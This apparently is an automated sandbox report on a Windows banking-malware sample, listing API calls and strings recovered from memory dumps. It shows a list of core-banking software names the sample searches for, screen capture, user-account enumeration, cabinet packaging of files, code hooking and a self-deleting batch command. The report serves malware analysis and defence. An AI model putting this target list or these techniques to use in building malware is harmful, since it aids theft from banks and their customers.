ExitProcess.KERNEL32(00000004), ref: 0351C5D5
CreateDirectoryW.KERNEL32(0353D6D0,00000000), ref: 0351C5E4
ExitProcess.KERNEL32(00000001), ref: 0351C5F7
#14.CABINET(?), ref: 0351C604
GetModuleHandleW.KERNEL32(00000000), ref: 0351C6F5
VirtualAlloc.KERNEL32 ref: 0351C829
VirtualAlloc.KERNEL32 ref: 0351CC19
VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0351CDA0
LoadLibraryA.KERNEL32(?), ref: 0351CFE5

Strings

z, xrefs: 0351C561
GetProcAddress, xrefs: 0351C656
LoadLibraryA, xrefs: 0351C677
VirtualAlloc, xrefs: 0351C693
RtlDecompressBuffer, xrefs: 0351C6AC
VirtualProtect, xrefs: 0351C6C8
F, xrefs: 0351C85E
F, xrefs: 0351C88E
F, xrefs: 0351C90B
F, xrefs: 0351C9C0
F, xrefs: 0351C9F0
F, xrefs: 0351CA80
<, xrefs: 0351CB1B
2, xrefs: 0351CB65
2, xrefs: 0351CBF8
GetSystemTime, xrefs: 0351CCAD

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Non-executed Functions

Function 00C2DBE8, Relevance: 66.8, APIs: 19, Strings: 19, Instructions: 103

APIs

StrStrIW.SHLWAPI(tellerplus), ref: 00C2DBFA
StrStrIW.SHLWAPI(bancline), ref: 00C2DC0F
StrStrIW.SHLWAPI(fidelity), ref: 00C2DC24
StrStrIW.SHLWAPI(micrsolv), ref: 00C2DC39
StrStrIW.SHLWAPI(bankman), ref: 00C2DC4E
StrStrIW.SHLWAPI(vantiv), ref: 00C2DC63
StrStrIW.SHLWAPI(episys), ref: 00C2DC78
StrStrIW.SHLWAPI(jack henry), ref: 00C2DC8D
StrStrIW.SHLWAPI(cruisenet), ref: 00C2DCA2
StrStrIW.SHLWAPI(gplusmain), ref: 00C2DCB7
StrStrIW.SHLWAPI(launchpadshell.exe), ref: 00C2DCCC
StrStrIW.SHLWAPI(dirclt32.exe), ref: 00C2DCE1
StrStrIW.SHLWAPI(wtng.exe), ref: 00C2DCF2
StrStrIW.SHLWAPI(prologue.exe), ref: 00C2DD03
StrStrIW.SHLWAPI(silverlake), ref: 00C2DD14
StrStrIW.SHLWAPI(pcsws.exe), ref: 00C2DD25
StrStrIW.SHLWAPI(v48d0250s1), ref: 00C2DD36
StrStrIW.SHLWAPI(fdmaster.exe), ref: 00C2DD47
StrStrIW.SHLWAPI(fastdoc), ref: 00C2DD58

Strings

tellerplus, xrefs: 00C2DBEF
bancline, xrefs: 00C2DC04
fidelity, xrefs: 00C2DC19
micrsolv, xrefs: 00C2DC2E
bankman, xrefs: 00C2DC43
vantiv, xrefs: 00C2DC58
episys, xrefs: 00C2DC6D
jack henry, xrefs: 00C2DC82
cruisenet, xrefs: 00C2DC97
gplusmain, xrefs: 00C2DCAC
launchpadshell.exe, xrefs: 00C2DCC1
dirclt32.exe, xrefs: 00C2DCD6
wtng.exe, xrefs: 00C2DCE7
prologue.exe, xrefs: 00C2DCF8
silverlake, xrefs: 00C2DD09
pcsws.exe, xrefs: 00C2DD1A
v48d0250s1, xrefs: 00C2DD2B
fdmaster.exe, xrefs: 00C2DD3C
fastdoc, xrefs: 00C2DD4D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C34085, Relevance: 48.4, APIs: 20, Strings: 4, Instructions: 151

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00C34097
GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00C340AF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C340EE
CreateCompatibleDC.GDI32 ref: 00C340FF
LoadCursorW.USER32(00000000,00007F00), ref: 00C34115
GetIconInfo.USER32(?,?), ref: 00C34129
GetCursorPos.USER32(?), ref: 00C34138
GetDeviceCaps.GDI32(?,00000008), ref: 00C3414F
GetDeviceCaps.GDI32(?,0000000A), ref: 00C34158
CreateCompatibleBitmap.GDI32(?,?), ref: 00C34164
SelectObject.GDI32 ref: 00C34172
BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00C34193
DrawIcon.USER32(?,?,?,?), ref: 00C341C5

Part of subcall function 00C3332C: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00C33341
Part of subcall function 00C3332C: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00C3334C

SelectObject.GDI32(?,00000008), ref: 00C341E1
DeleteObject.GDI32 ref: 00C341E8
DeleteDC.GDI32 ref: 00C341EF
DeleteDC.GDI32 ref: 00C341F6
FreeLibrary.KERNEL32(?), ref: 00C34206
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00C3421C
FreeLibrary.KERNEL32(?), ref: 00C34230

Strings

gdiplus.dll, xrefs: 00C3408C
GdiplusStartup, xrefs: 00C340A9
DISPLAY, xrefs: 00C340E9
GdiplusShutdown, xrefs: 00C34216

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351F2F7, Relevance: 44.3, APIs: 16, Strings: 6, Instructions: 134

APIs

Part of subcall function 0351E255: RtlEncodePointer.NTDLL(00000000,0351D714,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000), ref: 0351E257

LoadLibraryW.KERNEL32(USER32.DLL), ref: 0351F332
GetProcAddress.KERNEL32(?,MessageBoxW), ref: 0351F34E
EncodePointer.KERNEL32(?,?,MessageBoxW), ref: 0351F35F
GetProcAddress.KERNEL32(?,GetActiveWindow), ref: 0351F36C
EncodePointer.KERNEL32(?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F36F
GetProcAddress.KERNEL32(?,GetLastActivePopup), ref: 0351F37C
EncodePointer.KERNEL32(?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F37F
GetProcAddress.KERNEL32(?,GetUserObjectInformationW), ref: 0351F38C
EncodePointer.KERNEL32(?,?,GetUserObjectInformationW,?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F38F
GetProcAddress.KERNEL32(?,GetProcessWindowStation), ref: 0351F3A0
EncodePointer.KERNEL32(?,?,GetProcessWindowStation,?,?,GetUserObjectInformationW,?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F3A3
DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F3C5
DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F3CF
DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F40E
DecodePointer.KERNEL32(?), ref: 0351F428
DecodePointer.KERNEL32(0355A89F,00000314), ref: 0351F43C

Part of subcall function 0351F662: IsDebuggerPresent.KERNEL32 ref: 0352098D
Part of subcall function 0351F662: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
Part of subcall function 0351F662: UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
Part of subcall function 0351F662: GetCurrentProcess.KERNEL32 ref: 035209C9
Part of subcall function 0351F662: TerminateProcess.KERNEL32 ref: 035209D0

Strings

USER32.DLL, xrefs: 0351F32D
MessageBoxW, xrefs: 0351F348
GetActiveWindow, xrefs: 0351F361
GetLastActivePopup, xrefs: 0351F371
GetUserObjectInformationW, xrefs: 0351F381
GetProcessWindowStation, xrefs: 0351F39A

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C36A69, Relevance: 38.0, APIs: 1, Instructions: 7

APIs

HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C45087, Relevance: 34.4, APIs: 16, Strings: 1, Instructions: 241

APIs

Part of subcall function 00C31B16: CreateFileW.KERNEL32(00F41EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C31B2F
Part of subcall function 00C31B16: GetFileSizeEx.KERNEL32(?,?), ref: 00C31B42
Part of subcall function 00C31B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C31B68
Part of subcall function 00C31B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C31B80
Part of subcall function 00C31B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31B9E
Part of subcall function 00C31B16: CloseHandle.KERNEL32 ref: 00C31BA7

CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4512D
GetLastError.KERNEL32(?,?,00000001,?,?,?,00C45452), ref: 00C4513D
CloseHandle.KERNEL32 ref: 00C4514B
CloseHandle.KERNEL32 ref: 00C45229

Part of subcall function 00C44BA2: memcpy.MSVCRT ref: 00C44BB2

lstrlenW.KERNEL32(?), ref: 00C451AD

Part of subcall function 00C54181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C541A1
Part of subcall function 00C54181: Process32FirstW.KERNEL32(?,?), ref: 00C541C6
Part of subcall function 00C54181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C5421D
Part of subcall function 00C54181: CloseHandle.KERNEL32 ref: 00C5423B
Part of subcall function 00C54181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00C54257
Part of subcall function 00C54181: memcmp.MSVCRT ref: 00C5426F
Part of subcall function 00C54181: CloseHandle.KERNEL32(?), ref: 00C542E7
Part of subcall function 00C54181: Process32NextW.KERNEL32(?,?), ref: 00C542F3
Part of subcall function 00C54181: CloseHandle.KERNEL32 ref: 00C54306

ExitWindowsEx.USER32(00000014,80000000), ref: 00C451DD
OpenEventW.KERNEL32(00000002,00000000,?), ref: 00C45203
SetEvent.KERNEL32 ref: 00C45210
CloseHandle.KERNEL32 ref: 00C45217
IsWellKnownSid.ADVAPI32(00F41EC0,00000016), ref: 00C45279
CreateEventW.KERNEL32(00C62974,00000001,00000000,?), ref: 00C45348
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C45361
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C45373
CloseHandle.KERNEL32(00000000), ref: 00C4538A
CloseHandle.KERNEL32(?), ref: 00C45390
CloseHandle.KERNEL32(?), ref: 00C45396

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Part of subcall function 00C3E8A2: VirtualProtect.KERNEL32(00C39777,?,00000040,?), ref: 00C3E8BA
Part of subcall function 00C3E8A2: VirtualProtect.KERNEL32(00C39777,?,?,?), ref: 00C3E92D

Part of subcall function 00C4BAD3: memcpy.MSVCRT ref: 00C4BAEE
Part of subcall function 00C4BAD3: StringFromGUID2.OLE32(?), ref: 00C4BB92

Part of subcall function 00C399FA: LoadLibraryW.KERNEL32(?), ref: 00C39A1C
Part of subcall function 00C399FA: GetProcAddress.KERNEL32(?,?), ref: 00C39A40
Part of subcall function 00C399FA: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00C39A78
Part of subcall function 00C399FA: lstrlenW.KERNEL32(?), ref: 00C39A90
Part of subcall function 00C399FA: StrCmpNIW.SHLWAPI(?,?), ref: 00C39AA4
Part of subcall function 00C399FA: lstrlenW.KERNEL32(?), ref: 00C39ABA
Part of subcall function 00C399FA: memcpy.MSVCRT ref: 00C39AC6
Part of subcall function 00C399FA: FreeLibrary.KERNEL32 ref: 00C39ADC
Part of subcall function 00C399FA: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00C39B1B
Part of subcall function 00C399FA: NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00C39B57
Part of subcall function 00C399FA: NetApiBufferFree.NETAPI32(?), ref: 00C39C02
Part of subcall function 00C399FA: NetApiBufferFree.NETAPI32(00000000), ref: 00C39C14
Part of subcall function 00C399FA: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00C39C33

Part of subcall function 00C35433: CharToOemW.USER32(00F41EF0,?), ref: 00C35444

Part of subcall function 00C4B0C1: GetCommandLineW.KERNEL32 ref: 00C4B0DB
Part of subcall function 00C4B0C1: CommandLineToArgvW.SHELL32 ref: 00C4B0E2
Part of subcall function 00C4B0C1: StrCmpNW.SHLWAPI(?,00C27F1C,00000002), ref: 00C4B108
Part of subcall function 00C4B0C1: LocalFree.KERNEL32 ref: 00C4B134
Part of subcall function 00C4B0C1: MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00C4B171
Part of subcall function 00C4B0C1: memcpy.MSVCRT ref: 00C4B184
Part of subcall function 00C4B0C1: UnmapViewOfFile.KERNEL32 ref: 00C4B1BD
Part of subcall function 00C4B0C1: memcpy.MSVCRT ref: 00C4B1E0
Part of subcall function 00C4B0C1: CloseHandle.KERNEL32 ref: 00C4B1F9

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

Part of subcall function 00C39925: memcpy.MSVCRT ref: 00C3993C
Part of subcall function 00C39925: memcmp.MSVCRT ref: 00C3995E
Part of subcall function 00C39925: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3998C
Part of subcall function 00C39925: lstrcmpiW.KERNEL32(?), ref: 00C399DC

Part of subcall function 00C31BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31BC6
Part of subcall function 00C31BB5: CloseHandle.KERNEL32 ref: 00C31BD5

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C45304

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C399FA, Relevance: 28.4, APIs: 13, Strings: 1, Instructions: 205

APIs

LoadLibraryW.KERNEL32(?), ref: 00C39A1C
GetProcAddress.KERNEL32(?,?), ref: 00C39A40
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00C39A78
lstrlenW.KERNEL32(?), ref: 00C39A90
StrCmpNIW.SHLWAPI(?,?), ref: 00C39AA4
lstrlenW.KERNEL32(?), ref: 00C39ABA
memcpy.MSVCRT ref: 00C39AC6
FreeLibrary.KERNEL32 ref: 00C39ADC
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00C39B1B
NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00C39B57

Part of subcall function 00C44ED1: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00C44EE5
Part of subcall function 00C44ED1: PathUnquoteSpacesW.SHLWAPI(?), ref: 00C44F4A
Part of subcall function 00C44ED1: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00C44F59
Part of subcall function 00C44ED1: LocalFree.KERNEL32(00000001), ref: 00C44F6D

NetApiBufferFree.NETAPI32(?), ref: 00C39C02

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Part of subcall function 00C44461: PathSkipRootW.SHLWAPI(?), ref: 00C4448B
Part of subcall function 00C44461: GetFileAttributesW.KERNEL32(?), ref: 00C444B8
Part of subcall function 00C44461: CreateDirectoryW.KERNEL32(?,00000000), ref: 00C444CC
Part of subcall function 00C44461: SetLastError.KERNEL32(00000050), ref: 00C444EF

Part of subcall function 00C39633: LoadLibraryW.KERNEL32(?), ref: 00C39657
Part of subcall function 00C39633: GetProcAddress.KERNEL32(?,?), ref: 00C39685
Part of subcall function 00C39633: GetProcAddress.KERNEL32(?,?), ref: 00C3969F
Part of subcall function 00C39633: GetProcAddress.KERNEL32(?,?), ref: 00C396BB
Part of subcall function 00C39633: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00C396E8
Part of subcall function 00C39633: FreeLibrary.KERNEL32 ref: 00C39769

NetApiBufferFree.NETAPI32(00000000), ref: 00C39C14
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00C39C33

Part of subcall function 00C4B70A: CreateDirectoryW.KERNEL32(?,00000000), ref: 00C4B783
Part of subcall function 00C4B70A: SetFileAttributesW.KERNEL32(?), ref: 00C4B7A2
Part of subcall function 00C4B70A: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00C4B7B9
Part of subcall function 00C4B70A: GetLastError.KERNEL32(?,00000002,?,?), ref: 00C4B7C6
Part of subcall function 00C4B70A: CloseHandle.KERNEL32 ref: 00C4B7FF

Part of subcall function 00C37058: GetFileSizeEx.KERNEL32(00000000,?), ref: 00C3708F
Part of subcall function 00C37058: SetEndOfFile.KERNEL32 ref: 00C37105
Part of subcall function 00C37058: FlushFileBuffers.KERNEL32(?), ref: 00C37110

Strings

.exe, xrefs: 00C39BBC 00C39C4D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3D2B1, Relevance: 27.2, APIs: 18, Instructions: 214

APIs

GetProcAddress.KERNEL32(?,?), ref: 00C3D2D5
GetProcAddress.KERNEL32(?,?), ref: 00C3D2F5
GetProcAddress.KERNEL32(?,?), ref: 00C3D30E
GetProcAddress.KERNEL32(?,?), ref: 00C3D327
GetProcAddress.KERNEL32(?,?), ref: 00C3D340
GetProcAddress.KERNEL32(?,?), ref: 00C3D359
GetProcAddress.KERNEL32(?,?), ref: 00C3D376
GetProcAddress.KERNEL32(?,?), ref: 00C3D393
GetProcAddress.KERNEL32(?,?), ref: 00C3D3B0
GetProcAddress.KERNEL32(?,?), ref: 00C3D3CD
GetProcAddress.KERNEL32(?,?), ref: 00C3D3EA
GetProcAddress.KERNEL32(?,?), ref: 00C3D407
GetProcAddress.KERNEL32(?,?), ref: 00C3D424
GetProcAddress.KERNEL32(?,?), ref: 00C3D441
GetProcAddress.KERNEL32(?,?), ref: 00C3D45E
GetProcAddress.KERNEL32(?,?), ref: 00C3D47B
GetProcAddress.KERNEL32(?,?), ref: 00C3D498
GetProcAddress.KERNEL32(?,?), ref: 00C3D4B5

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C39C8D, Relevance: 24.4, APIs: 10, Strings: 2, Instructions: 184

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39CCE
PathRemoveFileSpecW.SHLWAPI(?), ref: 00C39D17
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39D3E
PathRemoveFileSpecW.SHLWAPI(?), ref: 00C39D87
SetEvent.KERNEL32 ref: 00C39D9A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C39DAD

Part of subcall function 00C3E4B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3E4E9
Part of subcall function 00C3E4B6: Sleep.KERNEL32(000001F4), ref: 00C3E57E

Part of subcall function 00C444FB: FindFirstFileW.KERNEL32(?,?), ref: 00C4452C
Part of subcall function 00C444FB: FindNextFileW.KERNEL32(?,?), ref: 00C4457E
Part of subcall function 00C444FB: FindClose.KERNEL32 ref: 00C44589
Part of subcall function 00C444FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C44595
Part of subcall function 00C444FB: RemoveDirectoryW.KERNEL32(?), ref: 00C4459C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C39DF1

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Part of subcall function 00C410E0: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4113B
Part of subcall function 00C410E0: RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C411A5
Part of subcall function 00C410E0: RegFlushKey.ADVAPI32(00000000), ref: 00C411D3
Part of subcall function 00C410E0: RegCloseKey.ADVAPI32(00000000), ref: 00C411DA

CharToOemW.USER32(?,?), ref: 00C39E6F
CharToOemW.USER32(?,?), ref: 00C39E81
ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00C39EEC

Part of subcall function 00C35482: CharToOemW.USER32(?,?), ref: 00C354C8
Part of subcall function 00C35482: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00C354FF
Part of subcall function 00C35482: CloseHandle.KERNEL32(000000FF), ref: 00C35527
Part of subcall function 00C35482: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00C35569
Part of subcall function 00C35482: memset.MSVCRT ref: 00C3557E
Part of subcall function 00C35482: CloseHandle.KERNEL32(000000FF), ref: 00C355B9

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C39CEB
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C39D5B

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C352FF, Relevance: 24.3, APIs: 8, Strings: 4, Instructions: 89

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00C3530F
GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00C3532D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00C35339
memset.MSVCRT ref: 00C35379
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00C353C6
CloseHandle.KERNEL32(?), ref: 00C353DA
CloseHandle.KERNEL32(?), ref: 00C353E0
FreeLibrary.KERNEL32 ref: 00C353F4

Strings

userenv.dll, xrefs: 00C35304
CreateEnvironmentBlock, xrefs: 00C35327
DestroyEnvironmentBlock, xrefs: 00C35333
D, xrefs: 00C353BA

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C5611F, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 261

APIs

Part of subcall function 00C4C43C: lstrlenW.KERNEL32 ref: 00C4C443
Part of subcall function 00C4C43C: memcpy.MSVCRT ref: 00C4C4D1

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

getpeername.WS2_32(?,?,?), ref: 00C56361

Part of subcall function 00C5306E: memcmp.MSVCRT ref: 00C53090

lstrcpyW.KERNEL32(?,0:0), ref: 00C563E9

Part of subcall function 00C53C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
Part of subcall function 00C53C83: StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Part of subcall function 00C52755: EnterCriticalSection.KERNEL32(Function_00043510,?,00C530AF,?,?,00000000), ref: 00C52765
Part of subcall function 00C52755: LeaveCriticalSection.KERNEL32(Function_00043510,?,00000000), ref: 00C5278F

WSAAddressToStringW.WS2_32(?,?,00000000), ref: 00C563D5

Strings

mSER, xrefs: 00C56176
hASS, xrefs: 00C5617D
U, xrefs: 00C561F1
lYPE, xrefs: 00C56279
~EAT, xrefs: 00C56280
hASV, xrefs: 00C56287
kTAT, xrefs: 00C562C3
tIST, xrefs: 00C562CA
0, xrefs: 00C563C4
0:0, xrefs: 00C563DF

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C35482, Relevance: 22.5, APIs: 6, Strings: 5, Instructions: 109

APIs

Part of subcall function 00C2E35B: GetTempPathW.KERNEL32(00000104,?), ref: 00C2E376
Part of subcall function 00C2E35B: PathAddBackslashW.SHLWAPI(?), ref: 00C2E3A0
Part of subcall function 00C2E35B: CreateDirectoryW.KERNEL32(?), ref: 00C2E457
Part of subcall function 00C2E35B: SetFileAttributesW.KERNEL32(?), ref: 00C2E468
Part of subcall function 00C2E35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00C2E481
Part of subcall function 00C2E35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00C2E492

CharToOemW.USER32(?,?), ref: 00C354C8
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00C354FF

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32(000000FF), ref: 00C35527
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00C35569
memset.MSVCRT ref: 00C3557E
CloseHandle.KERNEL32(000000FF), ref: 00C355B9

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Strings

.bat, xrefs: 00C3549C
@echo off%sdel /F "%s", xrefs: 00C354D9
/c "%s", xrefs: 00C35534
ComSpec, xrefs: 00C35564
D, xrefs: 00C3559E

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C55C75, Relevance: 22.3, APIs: 6, Strings: 5, Instructions: 60

APIs

LoadLibraryW.KERNEL32(cabinet.dll), ref: 00C55C89

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

GetProcAddress.KERNEL32(?,FCICreate), ref: 00C55CB8
GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00C55CC7
GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00C55CD6
GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00C55CE5

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

FreeLibrary.KERNEL32 ref: 00C55D1A

Strings

cabinet.dll, xrefs: 00C55C84
FCICreate, xrefs: 00C55CB1
FCIAddFile, xrefs: 00C55CBD
FCIFlushCabinet, xrefs: 00C55CCC
FCIDestroy, xrefs: 00C55CDB

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3357D, Relevance: 21.5, APIs: 12, Instructions: 144

APIs

Part of subcall function 00C36861: memchr.MSVCRT ref: 00C3689D
Part of subcall function 00C36861: memcmp.MSVCRT ref: 00C368BC

VirtualProtect.KERNEL32(?,00C337D4,00000080,?), ref: 00C335ED
VirtualProtect.KERNEL32(?,00C337D4,00000000,?), ref: 00C33756

Part of subcall function 00C36A7D: memcpy.MSVCRT ref: 00C36A9C

Part of subcall function 00C36B09: memcmp.MSVCRT ref: 00C36B29

GetCurrentThread.KERNEL32 ref: 00C336AC
GetThreadPriority.KERNEL32 ref: 00C336B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00C336C6
Sleep.KERNEL32(00000000), ref: 00C336CA
memcpy.MSVCRT ref: 00C336D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00C336EA
SetThreadPriority.KERNEL32 ref: 00C336F2

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

GetTickCount.KERNEL32 ref: 00C3370D
GetTickCount.KERNEL32 ref: 00C3371A
Sleep.KERNEL32(00000000), ref: 00C33727

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2CECC, Relevance: 21.3, APIs: 14, Instructions: 290

APIs

Sleep.KERNEL32(00003A98), ref: 00C2CEE3

Part of subcall function 00C35AF5: InitializeCriticalSection.KERNEL32 ref: 00C35AFC

InitializeCriticalSection.KERNEL32(?), ref: 00C2CF47
memset.MSVCRT ref: 00C2CF5E
InitializeCriticalSection.KERNEL32(?), ref: 00C2CF78

Part of subcall function 00C2FBE6: memset.MSVCRT ref: 00C2FBFD
Part of subcall function 00C2FBE6: memset.MSVCRT ref: 00C2FCD4

InitializeCriticalSection.KERNEL32(?), ref: 00C2CFD2
memset.MSVCRT ref: 00C2CFDD
memset.MSVCRT ref: 00C2CFEB

